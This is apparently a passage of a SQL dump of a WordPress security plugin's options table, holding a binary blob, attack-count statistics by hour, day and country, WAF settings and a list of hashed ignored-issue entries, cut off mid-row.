;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@���	�n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�š|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c���	ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug𿌫��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�񴝞1����5!\Z�����q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O!	U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n�	t���p\'��\\ˑ+&�*u4��c	\Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg���	r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k*	��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���;	I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z�	�0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�7p/�+\Z��z����:M�K��p���o�*A��vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/!u����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r�n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�.	���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu	l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]��	���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L	`$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs�	gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B�	�*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?�	x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� �؃��G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?ƒ�r�Тjs$_�D&֗��H��᝭s%��v�x-���#����?	���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v�᢭�(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�΍<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�ry��9H�$�Ī���50K5:\'�Ċ�$��Ժ���x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���\"�Ǣ�@�\n�py4&�7�:�wO�h4j�y�D��{�<n�н�>!��2��_U�d~��p��7O\";}�nir\Z\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1675157210;s:3:\"tdf\";a:3:{s:9:\"community\";i:5298;s:7:\"premium\";i:5320;s:9:\"blacklist\";i:12191;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1675069200;s:1:\"c\";i:14560216;}i:1;a:2:{s:1:\"t\";i:1675072800;s:1:\"c\";i:14177954;}i:2;a:2:{s:1:\"t\";i:1675076400;s:1:\"c\";i:14943220;}i:3;a:2:{s:1:\"t\";i:1675080000;s:1:\"c\";i:14681672;}i:4;a:2:{s:1:\"t\";i:1675083600;s:1:\"c\";i:14154441;}i:5;a:2:{s:1:\"t\";i:1675087200;s:1:\"c\";i:14451489;}i:6;a:2:{s:1:\"t\";i:1675090800;s:1:\"c\";i:14761176;}i:7;a:2:{s:1:\"t\";i:1675094400;s:1:\"c\";i:16334644;}i:8;a:2:{s:1:\"t\";i:1675098000;s:1:\"c\";i:13275566;}i:9;a:2:{s:1:\"t\";i:1675101600;s:1:\"c\";i:13889590;}i:10;a:2:{s:1:\"t\";i:1675105200;s:1:\"c\";i:13606235;}i:11;a:2:{s:1:\"t\";i:1675108800;s:1:\"c\";i:13401368;}i:12;a:2:{s:1:\"t\";i:1675112400;s:1:\"c\";i:13470346;}i:13;a:2:{s:1:\"t\";i:1675116000;s:1:\"c\";i:13594749;}i:14;a:2:{s:1:\"t\";i:1675119600;s:1:\"c\";i:13300396;}i:15;a:2:{s:1:\"t\";i:1675123200;s:1:\"c\";i:12413432;}i:16;a:2:{s:1:\"t\";i:1675126800;s:1:\"c\";i:12415769;}i:17;a:2:{s:1:\"t\";i:1675130400;s:1:\"c\";i:11806475;}i:18;a:2:{s:1:\"t\";i:1675134000;s:1:\"c\";i:11672873;}i:19;a:2:{s:1:\"t\";i:1675137600;s:1:\"c\";i:11471853;}i:20;a:2:{s:1:\"t\";i:1675141200;s:1:\"c\";i:11730100;}i:21;a:2:{s:1:\"t\";i:1675144800;s:1:\"c\";i:14335404;}i:22;a:2:{s:1:\"t\";i:1675148400;s:1:\"c\";i:18823383;}i:23;a:2:{s:1:\"t\";i:1675152000;s:1:\"c\";i:18810506;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1674518400;s:1:\"c\";i:347493037;}i:1;a:2:{s:1:\"t\";i:1674604800;s:1:\"c\";i:289205055;}i:2;a:2:{s:1:\"t\";i:1674691200;s:1:\"c\";i:259958081;}i:3;a:2:{s:1:\"t\";i:1674777600;s:1:\"c\";i:286929503;}i:4;a:2:{s:1:\"t\";i:1674864000;s:1:\"c\";i:470991554;}i:5;a:2:{s:1:\"t\";i:1674950400;s:1:\"c\";i:366991324;}i:6;a:2:{s:1:\"t\";i:1675036800;s:1:\"c\";i:352573204;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1672531200;s:1:\"c\";i:262572874;}i:1;a:2:{s:1:\"t\";i:1672617600;s:1:\"c\";i:405338773;}i:2;a:2:{s:1:\"t\";i:1672704000;s:1:\"c\";i:311930127;}i:3;a:2:{s:1:\"t\";i:1672790400;s:1:\"c\";i:382847396;}i:4;a:2:{s:1:\"t\";i:1672876800;s:1:\"c\";i:261924149;}i:5;a:2:{s:1:\"t\";i:1672963200;s:1:\"c\";i:303628234;}i:6;a:2:{s:1:\"t\";i:1673049600;s:1:\"c\";i:241145727;}i:7;a:2:{s:1:\"t\";i:1673136000;s:1:\"c\";i:311066856;}i:8;a:2:{s:1:\"t\";i:1673222400;s:1:\"c\";i:313019340;}i:9;a:2:{s:1:\"t\";i:1673308800;s:1:\"c\";i:304089676;}i:10;a:2:{s:1:\"t\";i:1673395200;s:1:\"c\";i:267299963;}i:11;a:2:{s:1:\"t\";i:1673481600;s:1:\"c\";i:282121560;}i:12;a:2:{s:1:\"t\";i:1673568000;s:1:\"c\";i:282483630;}i:13;a:2:{s:1:\"t\";i:1673654400;s:1:\"c\";i:239458894;}i:14;a:2:{s:1:\"t\";i:1673740800;s:1:\"c\";i:450881492;}i:15;a:2:{s:1:\"t\";i:1673827200;s:1:\"c\";i:376323651;}i:16;a:2:{s:1:\"t\";i:1673913600;s:1:\"c\";i:289270153;}i:17;a:2:{s:1:\"t\";i:1674000000;s:1:\"c\";i:295138946;}i:18;a:2:{s:1:\"t\";i:1674086400;s:1:\"c\";i:204870849;}i:19;a:2:{s:1:\"t\";i:1674172800;s:1:\"c\";i:369902592;}i:20;a:2:{s:1:\"t\";i:1674259200;s:1:\"c\";i:303787271;}i:21;a:2:{s:1:\"t\";i:1674345600;s:1:\"c\";i:286660503;}i:22;a:2:{s:1:\"t\";i:1674432000;s:1:\"c\";i:359847216;}i:23;a:2:{s:1:\"t\";i:1674518400;s:1:\"c\";i:347493037;}i:24;a:2:{s:1:\"t\";i:1674604800;s:1:\"c\";i:289205055;}i:25;a:2:{s:1:\"t\";i:1674691200;s:1:\"c\";i:259958081;}i:26;a:2:{s:1:\"t\";i:1674777600;s:1:\"c\";i:286929503;}i:27;a:2:{s:1:\"t\";i:1674864000;s:1:\"c\";i:470991554;}i:28;a:2:{s:1:\"t\";i:1674950400;s:1:\"c\";i:366991324;}i:29;a:2:{s:1:\"t\";i:1675036800;s:1:\"c\";i:352573204;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:845959154;}i:1;a:2:{s:2:\"cd\";s:2:\"TR\";s:2:\"ct\";i:262243193;}i:2;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:250364790;}i:3;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:194916165;}i:4;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:110367572;}i:5;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:110120388;}i:6;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:91947140;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:89950074;}i:8;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:81973394;}i:9;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:76440368;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"eadccc106acd883850ea3ecce8e844aeed3deeacf903fb8024e8fce83475cb9e\";}','no'),('dbVersion','10.5.18-MariaDB-1:10.5.18+maria~ubu2004','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1675653280','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:1088:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"b1e5b9cb3c257803cf24f1bb1b510d2f\";s:7:\"ignoreP\";s:32:\"d6c6ef1c4bd0d17915c64b2a6c80881b\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"ad86a6adfb0bc120ba27e5f25d531ae6\";s:7:\"ignoreP\";s:32:\"d4b7f1fa824009091ca88bc8431c2d5d\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"fb0f69e631665e40c09f1bdde5a9a935\";s:7:\"ignoreP\";s:32:\"f8db36cf1f202c253cbe365909099ac7\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"a59e8b23af4705ad231f00defd5b915d\";s:7:\"ignoreP\";s:32:\"27bdf3c39551e4629005fc2c701d109f\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"2b8db5b1d57ac84b8b75e8609cbfeeae\";s:7:\"ignoreP\";s:32:\"b37a26840312e3b3c18763705f4da3a7\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"3b486dc00b88b8ec3fac499e4516424f\";s:7:\"ignoreP\";s:32:\"746c77ca0faf6e1e2e4c12d894cdc8ad\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"094570aaf6eb960edd131dc70b79b86e\";s:7:\"ignoreP\";s:32:\"2e66d497e28bc4b0949a77ad9ce109ec\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"29e22428322f9cd0bb8c194b0351691d\";s:7:\"ignoreP\";s:32:\"0e91757e0c8d50dbed226906331b98e1\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"e309e209bd6b1f00fccc9b9dff421520\";s:7:\"ignoreP\";s:32:\"b419f3f1318db6a80831aac6c974b215\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"d0a4707b76d96df4f3b9eb174f3088af\";s:7:\"ignoreP\";s:32:\"4d6e056decb678c880adaf6e19bd130d\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"eb25f4a3edc34be447a1c473b875b321\";s:7:\"ignoreP\";s:32:\"b39d4d31c4ffcfffcc9c187b8d4e2aba\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"5cd8df20639b43ec92f1a34123bbb510\";s:7:\"ignoreP\";s:32:\"4857d6d22db5da4f85db2310cdea4e73\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"7144703c890fd4c618e9f4e23180c591\";s:7:\"ignoreP\";s:32:\"63b4fdc561efbc182162fe8e2b020aab\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"b0aa9aed7abbeda7ea5edf74c8d90788\";s:7:\"ignoreP\";s:32:\"ade974a0a2103f178a12ef0a654048e4\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"f8fc843391244be220571df84d75f481\";s:7:\"ignoreP\";s:32:\"16ed280bccc089646b4a4f6c198c0970\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"ea24885244c80276daff4fc01d490e2e\";s:7:\"ignoreP\";s:32:\"9c6facbb93c52f153044d18bef362cb1\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"3b2cf90046407269d9b6f8cfcb51c435\";s:7:\"ignoreP\";s:32:\"0c6107804b14cca9822b46ad36b4634a\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"427354ac098e637a83f05a7f703bfa34\";s:7:\"ignoreP\";s:32:\"bd92a448e9404a9397d668d648aa7357\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"a9787116e569d78a697c4fa35a57be9d\";s:7:\"ignoreP\";s:32:\"1c50c5939344b30338ffa100a1340f28\";}i:19;a:2:{s:7:\"ignoreC\";s:32:\"96bd68c4225b9e6db05cc4536c71381d\";s:7:\"ignoreP\";s:32:\"f1be47743efe763230feb8fb24d89578\";}i:20;a:2:{s:7:\"ignoreC\";s:32:\"2b54342d192304c492f461ccc788ff26\";s:7:\"ignoreP\";s:32:\"978c04844b2990d21e9a400ef63d0a0e\";}i:21;a:2:{s:7:\"ignoreC\";s:32:\"af66a295159e2423772f9db7da5b7e13\";s:7:\"ignoreP\";s:32:\"7874856bba1f7bdad0f7f86ee68f7776\";}i:22;a:2:{s:7:\"ignoreC\";s:32:\"7a23e83c13c40fa1a0d82e699b27162d\";s:7:\"ignoreP\";s:32:\"2eda7305fa7f7fb50c594d00ba29750c\";}i:23;a:2:{s:7:\"ignoreC\";s:32:\"c68b0f65511508eaa726d2bad5262039\";s:7:\"ignoreP\";s:32:\"a3add13a7db6f378a66ff76b7d122fdf\";}i:24;a:2:{s:7:\"ignoreC\";s:32:\"c39d3a9cf4f752cbb10632e63640f062\";s:7:\"ignoreP\";s:32:\"061b96cdbbde410198bb2cbd13b63efd\";}i:25;a:2:{s:7:\"ignoreC\";s:32:\"5126d47178bb6189211ddac19f898205\";s:7:\"ignoreP\";s:32:\"d49e46fd12a0d78f679326b6e0668b15\";}i:26;a:2:{s:7:\"ignoreC\";s:32:\"b51152a67f77fa5958a8c0e8bddd10fd\";s:7:\"ignoreP\";s:32:\"aab4dcd5dd041c7af4e24951ea7430db\";}i:27;a:2:{s:7:\"ignoreC\";s:32:\"4c4965aafc20c71bf88136dd4349b589\";s:7:\"ignoreP\";s:32:\"db5f38cbc1f2c2e2c40da422fce72526\";}i:28;a:2:{s:7:\"ignoreC\";s:32:\"bbf363e9f0b25bdb36d333bd3e7b8af1\";s:7:\"ignoreP\";s:32:\"bec8fd7c6aae72a3aa35ad587eaf002e\";}i:29;a:2:{s:7:\"ignoreC\";s:32:\"f35e0ef82702c264989ba8c18478651e\";s:7:\"ignoreP\";s:32:\"2b206fbdf7ff7823b95252b729bd2ebf\";}i:30;a:2:{s:7:\"ignoreC\";s:32:\"eb3e06397f43378e6b0e430bbf989723\";s:7:\"ignoreP\";s:32:\"41e71671882c9581af1399d1ed8dd860\";}i:31;a:2:{s:7:\"ignoreC\";s:32:\"3443b8e777c11396ddd743efe9a41d29\";s:7:\"ignoreP\";s:32:\"3d48380350d884d197234943fd3c3ee5\";}i:32;a:2:{s:7:\"ignoreC\";s:32:\"3c89c647a7f536ad867b4580f3214688\";s:7:\"ignoreP\";s:32:\"73dfaac430e5389ce19aa21cb3ccc093\";}i:33;a:2:{s:7:\"ignoreC\";s:32:\"3825911a7c003cbd17b11d3b80a85126\";s:7:\"ignoreP\";s:32:\"cb32ba686922aead28570c444f509d22\";}i:34;a:2:{s:7:\"ignoreC\";s:32:\"7a6993fe2df1c8272226db50027b579f\";s:7:\"ignoreP\";s:32:\"a1482eb6d851c7c84a341a8d4a34b32e\";}i:35;a:2:{s:7:\"ignoreC\";s:32:\"d0763a0fa41399a5eda927724b2b7cb2\";s:7:\"ignoreP\";s:32:\"cb0d0db76feb51c8f392f503984e279d\";}i:36;a:2:{s:7:\"ignoreC\";s:32:\"d434dca383433b046f767b2b4065834e\";s:7:\"ignoreP\";s:32:\"1df4138e7c197bdd2ceb2d992b88fbe7\";}i:37;a:2:{s:7:\"ignoreC\";s:32:\"8692d85d37d340fcd61b86362d7e29eb\";s:7:\"ignoreP\";s:32:\"1bd9cd30a2c749dbe3faf4147e24c41e\";}i:38;a:2:{s:7:\"ignoreC\";s:32:\"5ae357a55508dd40bbfc9090cfc73df2\";s:7:\"ignoreP\";s:32:\"0d6eaa773ad70bbde25df574d17be7dd\";}i:39;a:2:{s:7:\"ignoreC\";s:32:\"6802085a76a4e14cf802ebdad03d4610\";s:7:\"ignoreP\";s:32:\"7d60a1fbe2939696666c55f9a63aede1\";}i:40;a:2:{s:7:\"ignoreC\";s:32:\"c3b20955ed3c325ba6aa28585e0a9f8c\";s:7:\"ignoreP\";s:32:\"358d3bb8d33493e2edcb23f1869bfbaf\";}i:41;a:2:{s:7:\"ignoreC\";s:32:\"5498d0fba84822b59a2b21a9970f82b6\";s:7:\"ignoreP\";s:32:\"9d8ee498ebd29ab404626597124d0d19\";}i:42;a:2:{s:7:\"ignoreC\";s:32:\"50c856ac6abc78569acc27cffdfbbba2\";s:7:\"ignoreP\";s:32:\"8bd773b75276d4189831ce0335ee3468\";}i:43;a:2:{s:7:\"ignoreC\";s:32:\"bb920d039626bb400e693a0c42af6944\";s:7:\"ignoreP\";s:32:\"e10e578616afea32bbdc6962b3cf7d22\";}i:44;a:2:{s:7:\"ignoreC\";s:32:\"ea84453fca5aefc70e1bab45bb41dc79\";s:7:\"ignoreP\";s:32:\"b9f717440af28d6ff812df42a65f5993\";}i:45;a:2:{s:7:\"ignoreC\";s:32:\"41e6e5afcd7dcf6406102fee571b954a\";s:7:\"ignoreP\";s:32:\"df6f77369f69cb13d7cfc63791433c70\";}i:46;a:2:{s:7:\"ignoreC\";s:32:\"442574d7d0e4b389611c71a61a6d5ec6\";s:7:\"ignoreP\";s:32:\"44fb3d39038be6d416fdac2b5a4e425d\";}i:47;a:2:{s:7:\"ignoreC\";s:32:\"ed6e8cb6283c9088d90ea9e2c11af901\";s:7:\"ignoreP\";s:32:\"a2aefa53a9c092b8622cbe4327956df8\";}i:48;a:2:{s:7:\"ignoreC\";s:32:\"308a93c32c2cc14d795e3c05f9c19e7b\";s:7:\"ignoreP\";s:32:\"7ec8959fc438630ed6a7a3707b75c9a8\";}i:49;a:2:{s:7:\"ignoreC\";s:32:\"05d7b9d140b77257170163e20176e757\";s:7:\"ignoreP\";s:32:\"b177d186faa1cd1a769fc76cc06451d9\";}i:50;a:2:{s:7:\"ignoreC\";s:32:\"359979f50d346e43ee57fdee473b7fee\";s:7:\"ignoreP\";s:32:\"cfde21f414e2ffb424511455234d3987\";}i:51;a:2:{s:7:\"ignoreC\";s:32:\"d55f98f9575a5e43c7b1009ea43584d5\";s:7:\"ignoreP\";s:32:\"18029643af851ce8e76cfc557bd57ac8\";}i:52;a:2:{s:7:\"ignoreC\";s:32:\"29691773e1ac8f4d9d7a5d3e5af00000\";s:7:\"ignoreP\";s:32:\"725b32d3268994909f36a06733fcd8f4\";}i:53;a:2:{s:7:\"ignoreC\";s:32:\"c75353afa6242b9b5bffe3f0ba3ad138\";s:7:\"ignoreP\";s:32:\"2f3e2950d064508606ebded6ab0a8dcd\";}i:54;a:2:{s:7:\"ignoreC\";s:32:\"ee49b615e44063af7b82ea4383b23eec\";s:7:\"ignoreP\";s:32:\"1ac2f1606a8b2c35a75787452a8db45c\";}i:55;a:2:{s:7:\"ignoreC\";s:32:\"7c064be7e8c72f294bf6591d6e08ac9d\";s:7:\"ignoreP\";s:32:\"e39b949c03a094b9aa8050478be14679\";}i:56;a:2:{s:7:\"ignoreC\";s:32:\"264c60f61b096a825c349c292dd9f342\";s:7:\"ignoreP\";s:32:\"63af136bddfabfdc444f53d8e2fb9e09\";}i:57;a:2:{s:7:\"ignoreC\";s:32:\"d5c7bc88ac5bd083aed6a6cb56e01de6\";s:7:\"ignoreP\";s:32:\"64d177550f1712b383c8932cf0b66b89\";}i:58;a:2:{s:7:\"ignoreC\";s:32:\"a2554eaf99bde245d60369f4b0dc9dc0\";s:7:\"ignoreP\";s:32:\"c9f5f41189fb6a850250f842e8e8fe78\";}i:59;a:2:{s:7:\"ignoreC\";s:32:\"86ea21b45a531ec807b8774ef4c85931\";s:7:\"ignoreP\";s:32:\"3a307568b91c4c6d21d6b720caced651\";}i:60;a:2:{s:7:\"ignoreC\";s:32:\"ec56fa728c9cd676a05c14948e3d79c7\";s:7:\"ignoreP\";s:32:\"1edebb36b535c614d9e7c7c094f19da8\";}i:61;a:2:{s:7:\"ignoreC\";s:32:\"f2fd3c08867fb69e5953f433ebf9ee9e\";s:7:\"ignoreP\";s:32:\"ec6c6d4f3c1555e5a7b967aaa9b1e76b\";}i:62;a:2:{s:7:\"ignoreC\";s:32:\"b195805576d759b